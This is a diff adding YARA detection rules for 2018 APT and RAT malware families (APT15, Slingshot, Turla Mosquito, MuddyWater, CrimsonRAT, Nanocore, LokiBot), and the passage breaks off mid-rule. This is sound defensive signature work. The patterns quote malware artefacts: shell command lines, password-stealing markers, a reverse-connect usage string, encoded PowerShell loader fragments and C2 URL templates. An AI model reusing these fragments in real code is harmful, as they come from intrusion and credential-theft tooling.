+rule TA18_074A_scripts_RID2CB1 : APT DEMO MAL {
+   meta:
+      description = "Detects malware mentioned in TA18-074A"
+      author = "Florian Roth"
+      reference = "https://www.us-cert.gov/ncas/alerts/TA18-074A"
+      date = "2018-03-16 10:00:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-08-18"
+      hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
+      tags = "APT, DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Running -s cmd /c query user on " ascii
+   condition: 
+      filesize < 600KB and 1 of them
+}
+
+rule APT15_Malware_Mar18_RoyalCli_RID30EA : APT DEMO EXE FILE G0004 MAL {
+   meta:
+      description = "Detects malware from APT 15 report by NCC Group"
+      author = "Florian Roth"
+      reference = "https://goo.gl/HZ5XMN"
+      date = "2018-03-10 13:00:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6df9b712ff56009810c4000a0ad47e41b7a6183b69416251e060b5c80cd05785"
+      tags = "APT, DEMO, EXE, FILE, G0004, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\Release\\RoyalCli.pdb" ascii
+      $s2 = "%snewcmd.exe" fullword ascii
+      $s3 = "Run cmd error %d" fullword ascii
+      $s4 = "%s~clitemp%08x.ini" fullword ascii
+      $s5 = "run file failed" fullword ascii
+      $s6 = "Cmd timeout %d" fullword ascii
+      $s7 = "2 %s  %d 0 %d" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+}
+
+rule APT15_Malware_Mar18_RoyalDNS_RID30B7 : APT DEMO EXE FILE G0004 MAL {
+   meta:
+      description = "Detects malware from APT 15 report by NCC Group"
+      author = "Florian Roth"
+      reference = "https://goo.gl/HZ5XMN"
+      date = "2018-03-10 12:51:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
+      tags = "APT, DEMO, EXE, FILE, G0004, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $x1 = "del c:\\windows\\temp\\r.exe /f /q" fullword ascii
+      $x2 = "%s\\r.exe" fullword ascii
+      $s1 = "rights.dll" fullword ascii
+      $s2 = "\"%s\">>\"%s\"\\s.txt" fullword ascii
+      $s3 = "Nwsapagent" fullword ascii
+      $s4 = "%s\\r.bat" fullword ascii
+      $s5 = "%s\\s.txt" fullword ascii
+      $s6 = "runexe" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( ( pe.exports ( "RunInstallA" ) and pe.exports ( "RunUninstallA" ) ) or 1 of ( $x* ) or 2 of them )
+}
+
+rule APT15_Malware_Mar18_BS2005_RID2F27 : APT DEMO EXE FILE G0004 MAL {
+   meta:
+      description = "Detects malware from APT 15 report by NCC Group"
+      author = "Florian Roth"
+      reference = "https://goo.gl/HZ5XMN"
+      date = "2018-03-10 11:45:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "750d9eecd533f89b8aa13aeab173a1cf813b021b6824bc30e60f5db6fa7b950b"
+      tags = "APT, DEMO, EXE, FILE, G0004, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "AAAAKQAASCMAABi+AABnhEBj8vep7VRoAEPRWLweGc0/eiDrXGajJXRxbXsTXAcZAABK4QAAPWwAACzWAAByrg==" fullword ascii
+      $x2 = "AAAAKQAASCMAABi+AABnhKv3kXJJousn5YzkjGF46eE3G8ZGse4B9uoqJo8Q2oF0AABK4QAAPWwAACzWAAByrg==" fullword ascii
+      $a1 = "http://%s/content.html?id=%s" fullword ascii
+      $a2 = "http://%s/main.php?ssid=%s" fullword ascii
+      $a3 = "http://%s/webmail.php?id=%s" fullword ascii
+      $a9 = "http://%s/error.html?tab=%s" fullword ascii
+      $s1 = "%s\\~tmp.txt" fullword ascii
+      $s2 = "%s /C %s >>\"%s\" 2>&1" fullword ascii
+      $s3 = "DisableFirstRunCustomize" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of them )
+}
+
+rule APT15_Malware_Mar18_MSExchangeTool_RID332C : APT DEMO EXE FILE G0004 MAL {
+   meta:
+      description = "Detects malware from APT 15 report by NCC Group"
+      author = "Florian Roth"
+      reference = "https://goo.gl/HZ5XMN"
+      date = "2018-03-10 14:36:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "16b868d1bef6be39f69b4e976595e7bd46b6c0595cf6bc482229dbb9e64f1bce"
+      tags = "APT, DEMO, EXE, FILE, G0004, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\Release\\EWSTEW.pdb" ascii
+      $s2 = "EWSTEW.exe" fullword wide
+      $s3 = "Microsoft.Exchange.WebServices.Data" fullword ascii
+      $s4 = "tmp.dat" fullword wide
+      $s6 = "/v or /t is null" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 40KB and all of them
+}
+
+rule Slingshot_APT_Minisling_RID3019 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Slingshot APT"
+      author = "Florian Roth"
+      reference = "https://securelist.com/apt-slingshot/84312/"
+      date = "2018-03-09 12:25:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "{6D29520B-F138-442e-B29F-A4E7140F33DE}" fullword ascii wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
+}
+
+rule Slingshot_APT_Spork_Downloader_RID32EC : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Slingshot APT"
+      author = "Florian Roth"
+      reference = "https://securelist.com/apt-slingshot/84312/"
+      date = "2018-03-09 14:25:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Usage: spork -c IP:PORT" fullword ascii wide
+      $s2 = "connect-back IP address and port number" 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
+}
+
+rule Slingshot_APT_Ring0_Loader_RID30E5 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Slingshot APT"
+      author = "Florian Roth"
+      reference = "https://securelist.com/apt-slingshot/84312/"
+      date = "2018-03-09 12:59:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = " -> Missing element in DataDir -- cannot install" ascii
+      $s2 = " -> Primary loader not present in the DataDir" ascii
+      $s3 = "\\\\.\\amxpci" fullword ascii
+      $s4 = " -> [Goad] ERROR in CreateFile:" fullword ascii
+      $s5 = "\\\\.\\Sandra" fullword ascii
+      $s6 = " -> [Sandra] RingZeroCode" fullword ascii
+      $s7 = " -> [Sandra] Value from IOCTL_RDMSR:" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
+}
+
+rule Slingshot_APT_Malware_1_RID2FC8 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Slingshot APT"
+      author = "Florian Roth"
+      reference = "https://securelist.com/apt-slingshot/84312/"
+      date = "2018-03-09 12:11:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4b250304e28648574b441831bf579b844e8e1fda941fb7f86a7ea7c4291bbca6"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "SlingDll.dll" fullword ascii
+      $s2 = "BogusDll." ascii
+      $s3 = "smsvcrt -h 0x%p" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "7ead4bb0d752003ce7c062adb7ffc51a" or pe.exports ( "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW0000" ) or 1 of them )
+}
+
+rule Slingshot_APT_Malware_3_RID2FCA : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Slingshot APT"
+      author = "Florian Roth"
+      reference = "https://securelist.com/apt-slingshot/84312/"
+      date = "2018-03-09 12:12:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fa513c65cded25a7992e2b0ab03c5dd5c6d0fc2282cd64a1e11a387a3341ce18"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $a1 = "chmhlpr.dll" fullword ascii
+      $s2 = "%hc%hc%hc%hc" fullword ascii
+      $s3 = "%hc%hc%hc=" fullword ascii
+      $s4 = "%hc%hc==" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "2f3b3df466e24e0792e0e90d668856bc" or pe.exports ( "dll_u" ) or ( $a1 and 2 of ( $s* ) ) )
+}
+
+rule Slingshot_APT_Malware_4_RID2FCB : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Slingshot APT"
+      author = "Florian Roth"
+      reference = "https://securelist.com/apt-slingshot/84312/"
+      date = "2018-03-09 12:12:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "38c4f5320b03cbaf5c14997ea321507730a8c16906e5906cbf458139c91d5945"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Ss -a 4104 -s 257092 -o 8 -l 406016 -r 4096 -z 315440" fullword wide
+      $s1 = "Slingshot" fullword ascii
+      $s2 = "\\\\?\\e:\\$Recycle.Bin\\" wide
+      $s3 = "LineRecs.reloc" fullword ascii
+      $s4 = "EXITGNG" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( $x1 or 2 of them )
+}
+
+rule TSCookie_RAT_RID2B58 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects TSCookie RAT"
+      author = "Florian Roth"
+      reference = "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html"
+      date = "2018-03-06 09:02:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2bd13d63797864a70b775bd1994016f5052dc8fd1fd83ce1c13234b5d304330d"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $x1 = "[-] DecryptPassword_Outlook failed(err=%d)" fullword ascii
+      $x2 = "----------------------- Firefox Passwords ------------------" fullword ascii
+      $x3 = "--------------- Outlook Passwords ------------------" fullword ascii
+      $x4 = "----------------------- IE Passwords ------------------" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( ( pe.exports ( "DoWork" ) and pe.exports ( "PrintF" ) ) or 1 of them )
+}
+
+rule CrimsonRAT_Mar18_1_RID2D4B : DEMO EXE FILE MAL T1082 T1113 {
+   meta:
+      description = "Detects CrimsonRAT malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-03-06 10:25:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "acf2e8013b6fafcf436d5a05049896504ffa2e982bca05155d19981d1931c611"
+      hash2 = "7ca6e5ef1d346ec35993c910128a3526b098a07445131784a9358bf5679e3975"
+      hash3 = "be4264973de9886caedae1cb707586588d0da85ac7a2ad277db4258033ea12a8"
+      tags = "DEMO, EXE, FILE, MAL, T1082, T1113"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|" wide
+      $x2 = "\\Release\\RTLBot.pdb" ascii
+      $x3 = "cmd.exe/c systeminfo >> 1.txt" fullword wide
+      $x4 = "/online >> Get online target with important info" fullword wide
+      $x5 = "/screen >> ScreenShot from target PC" fullword wide
+      $x6 = "/restart >> Restart Target PC" fullword wide
+      $x7 = "/log_key >> Get log key file" fullword wide
+      $a1 = "get_ShiftKey" fullword ascii
+      $a2 = "get_ControlKey" fullword ascii
+      $a3 = "get_AltKey" fullword ascii
+      $a4 = "get_MineInterval" fullword ascii
+      $fp1 = "Copyright Software Secure" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or all of ( $a* ) ) and not 1 of ( $fp* )
+}
+
+rule Gsecdump_password_dump_file_RID322F : DEMO FILE HKTL SUSP T1003 {
+   meta:
+      description = "Detects a gsecdump output file"
+      author = "Florian Roth"
+      reference = "https://t.co/OLIj1yVJ4m"
+      date = "2018-03-06 13:54:21"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, HKTL, SUSP, T1003"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "Administrator(current):500:" ascii
+   condition: 
+      uint32be ( 0 ) == 0x41646d69 and filesize < 3000 and $x1 at 0
+}
+
+rule OpHoneybee_MaoCheng_Dropper_RID319B : APT DEMO EXE FILE G0072 MAL T1035 {
+   meta:
+      description = "Detects MaoCheng dropper from Operation Honeybee"
+      author = "Florian Roth"
+      reference = "https://goo.gl/JAHZVL"
+      date = "2018-03-03 13:29:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "35904f482d37f5ce6034d6042bae207418e450f4"
+      tags = "APT, DEMO, EXE, FILE, G0072, MAL, T1035"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\MaoCheng\\Release\\" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and 1 of them
+}
+
+rule Sofacy_Trojan_Loader_Feb18_1_RID315E : DEMO EXE FILE G0007 MAL RUSSIA {
+   meta:
+      description = "Sofacy Activity Feb 2018"
+      author = "Florian Roth"
+      reference = "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100"
+      date = "2018-03-01 13:19:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "335565711db93cd02d948f472c51598be4d62d60f70f25a20449c07eae36c8c5"
+      tags = "DEMO, EXE, FILE, G0007, MAL, RUSSIA"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "%appdata%\\nad.dll" fullword wide
+      $s3 = "%appdata%\\nad.bat" fullword wide
+      $s1 = "apds.dll" fullword ascii
+      $s2 = "nad.dll\"" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a2d1be6502b4b3c28959a4fb0196ea45" or pe.exports ( "VidBitRpl" ) or 1 of ( $x* ) or 2 of them )
+}
+
+rule MuddyWater_Mal_Doc_Feb18_1_RID306A : DEMO FILE G0069 MAL {
+   meta:
+      description = "Detects malicious document used by MuddyWater"
+      author = "Florian Roth"
+      reference = "Internal Research - TI2T"
+      date = "2018-02-26 12:38:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c"
+      tags = "DEMO, FILE, G0069, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "aWV4KFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmco" ascii
+      $x2 = "U1FCdUFIWUFid0JyQUdVQUxRQkZBSGdBY0FCeUFHVUFjd0J6QUdrQWJ3QnVBQ0FBS" 
+   condition: 
+      uint16 ( 0 ) == 0xcfd0 and filesize < 3000KB and 1 of them
+}
+
+rule MuddyWater_Mal_Doc_Feb18_2_RID306B : DEMO FILE G0069 MAL {
+   meta:
+      description = "Detects malicious document used by MuddyWater"
+      author = "Florian Roth"
+      reference = "Internal Research - TI2T"
+      date = "2018-02-26 12:39:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c"
+      hash2 = "366d8b84a43a528e6aaf9ecfc38980b148f983967803914471ccf011b9bb0832"
+      tags = "DEMO, FILE, G0069, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" fullword wide
+      $s2 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide
+      $s3 = "*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Office16\\MSWORD.OLB#Microsoft Word 16.0 O" wide
+      $s4 = "scripting.filesystemobject$" fullword ascii
+      $s5 = "ID=\"{00000000-0000-0000-0000-000000000000}\"" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0xcfd0 and filesize < 6000KB and all of them
+}
+
+rule IceFog_Malware_Feb18_1_RID2ECB : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects IceFog malware"
+      author = "Florian Roth"
+      reference = "https://twitter.com/ClearskySec/status/968104465818669057"
+      date = "2018-02-26 11:29:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "480373cffc4e60aa5be2954a156e37d689b92e6e33969958230f2ce59d30b9ec"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cmd /c %c%s%c" fullword ascii
+      $s2 = "temp.bat" fullword ascii
+      $s3 = "c:\\windows\\debug\\wia\\help" fullword wide
+      $s4 = "/getorder.aspx?hostname=" fullword wide
+      $s5 = "\\filecfg_temp.dat" wide
+      $s6 = "Unknown operating system " fullword wide
+      $s7 = "kastygost.compress.to" fullword wide
+      $s8 = "/downloads/" wide
+      $s9 = "\\key.dat" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 4 of them
+}
+
+rule TurlaMosquito_Mal_1_RID2E83 : DEMO EXE FILE G0010 MAL RUSSIA {
+   meta:
+      description = "Detects malware sample from Turla Mosquito report"
+      author = "Florian Roth"
+      reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+      date = "2018-02-22 11:17:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b295032919143f5b6b3c87ad22bcf8b55ecc9244aa9f6f88fc28f36f5aa2925e"
+      tags = "DEMO, EXE, FILE, G0010, MAL, RUSSIA"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "Pipetp" fullword ascii
+      $s2 = "EStOpnabn" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "169d4237c79549303cca870592278f42" or all of them )
+}
+
+rule TurlaMosquito_Mal_2_RID2E84 : DEMO EXE FILE G0010 MAL RUSSIA {
+   meta:
+      description = "Detects malware sample from Turla Mosquito report"
+      author = "Florian Roth"
+      reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+      date = "2018-02-22 11:17:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "68c6e9dea81f082601ae5afc41870cea3f71b22bfc19bcfbc61d84786e481cb4"
+      hash2 = "05254971fe3e1ca448844f8cfcfb2b0de27e48abd45ea2a3df897074a419a3f4"
+      tags = "DEMO, EXE, FILE, G0010, MAL, RUSSIA"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = ".?AVFileNameParseException@ExecuteFile@@" fullword ascii
+      $s3 = "no_address" fullword wide
+      $s6 = "SRRRQP" fullword ascii
+      $s7 = "QWVPQQ" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "cd918073f209c5da7a16b6c125d73746" or all of them )
+}
+
+rule TurlaMosquito_Mal_3_RID2E85 : DEMO EXE FILE G0010 MAL RUSSIA T1047 {
+   meta:
+      description = "Detects malware sample from Turla Mosquito report"
+      author = "Florian Roth"
+      reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+      date = "2018-02-22 11:18:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "443cd03b37fca8a5df1bbaa6320649b441ca50d1c1fcc4f5a7b94b95040c73d1"
+      tags = "DEMO, EXE, FILE, G0010, MAL, RUSSIA, T1047"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "InstructionerDLL.dll" fullword ascii
+      $s1 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" fullword wide
+      $s2 = "/scripts/m/query.php?id=" fullword wide
+      $s3 = "SELECT * FROM AntiVirusProduct" fullword ascii
+      $s4 = "Microsoft Update" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "88488fe0b8bcd6e379dea6433bb5d7d8" or ( pe.exports ( "InstallRoutineW" ) and pe.exports ( "StartRoutine" ) ) or $x1 or 3 of them )
+}
+
+rule TurlaMosquito_Mal_4_RID2E86 : DEMO EXE FILE G0010 MAL RUSSIA {
+   meta:
+      description = "Detects malware sample from Turla Mosquito report"
+      author = "Florian Roth"
+      reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+      date = "2018-02-22 11:18:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b362b235539b762734a1833c7e6c366c1b46474f05dc17b3a631b3bff95a5eec"
+      tags = "DEMO, EXE, FILE, G0010, MAL, RUSSIA"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 800KB and pe.imphash ( ) == "17b328245e2874a76c2f46f9a92c3bad"
+}
+
+rule TurlaMosquito_Mal_5_RID2E87 : DEMO EXE FILE G0010 MAL RUSSIA {
+   meta:
+      description = "Detects malware sample from Turla Mosquito report"
+      author = "Florian Roth"
+      reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+      date = "2018-02-22 11:18:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "26a1a42bc74e14887616f9d6048c17b1b4231466716a6426e7162426e1a08030"
+      tags = "DEMO, EXE, FILE, G0010, MAL, RUSSIA"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "ac40cf7479f53a4754ac6481a4f24e57"
+}
+
+rule TurlaMosquito_Mal_6_RID2E88 : DEMO EXE FILE G0010 MAL RUSSIA {
+   meta:
+      description = "Detects malware sample from Turla Mosquito report"
+      author = "Florian Roth"
+      reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+      date = "2018-02-22 11:18:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b79cdf929d4a340bdd5f29b3aeccd3c65e39540d4529b64e50ebeacd9cdee5e9"
+      tags = "DEMO, EXE, FILE, G0010, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "/scripts/m/query.php?id=" fullword wide
+      $a2 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" fullword wide
+      $a3 = "GetUserNameW fails" fullword wide
+      $s1 = "QVSWQQ" fullword ascii
+      $s2 = "SRRRQP" fullword ascii
+      $s3 = "QSVVQQ" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and ( 2 of ( $a* ) or 4 of them )
+}
+
+rule Nanocore_RAT_Feb18_1_RID2DF1 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Nanocore RAT"
+      author = "Florian Roth"
+      reference = "Internal Research - T2T"
+      date = "2018-02-19 10:53:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "NanoCore Client.exe" fullword ascii
+      $x2 = "NanoCore.ClientPluginHost" fullword ascii
+      $s1 = "PluginCommand" fullword ascii
+      $s2 = "FileCommand" fullword ascii
+      $s3 = "PipeExists" fullword ascii
+      $s4 = "PipeCreated" fullword ascii
+      $s5 = "IClientLoggingHost" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 5 of them )
+}
+
+rule Nanocore_RAT_Feb18_2_RID2DF2 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Nanocore RAT"
+      author = "Florian Roth"
+      reference = "Internal Research - T2T"
+      date = "2018-02-19 10:53:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "377ef8febfd8df1a57a7966043ff0c7b8f3973c2cf666136e6c04080bbf9881a"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ResManagerRunnable" fullword ascii
+      $s2 = "TransformRunnable" fullword ascii
+      $s3 = "MethodInfoRunnable" fullword ascii
+      $s4 = "ResRunnable" fullword ascii
+      $s5 = "RunRunnable" fullword ascii
+      $s6 = "AsmRunnable" fullword ascii
+      $s7 = "ReadRunnable" fullword ascii
+      $s8 = "ExitRunnable" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+}
+
+rule LokiBot_Dropper_ScanCopyPDF_Feb18_RID332E : DEMO EXE FILE MAL {
+   meta:
+      description = "Semiautomatically generated YARA rule - file Scan Copy.pdf.com"
+      author = "Florian Roth"
+      reference = "https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5"
+      date = "2018-02-14 14:36:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6f8ff26a5daf47effdea5795cdadfff9265c93a0ebca0ce5a4144712f8cab5be"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Win32           Scan Copy.pdf   " fullword wide
+      $a1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii
+      $s1 = "Compiling2.exe" fullword wide
+      $s2 = "Unstalled2" fullword ascii
+      $s3 = "Compiling.exe" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and $x1 or ( $a1 and 1 of ( $s* ) )
+}
+
+rule LokiBot_Dropper_Packed_R11_Feb18_RID328F : DEMO FILE MAL T1045 {
+   meta:
+      description = "Semiautomatically generated YARA rule - file scan copy.pdf.r11"
+      author = "Florian Roth"
+      reference = "https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5"
+      date = "2018-02-14 14:10:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029"
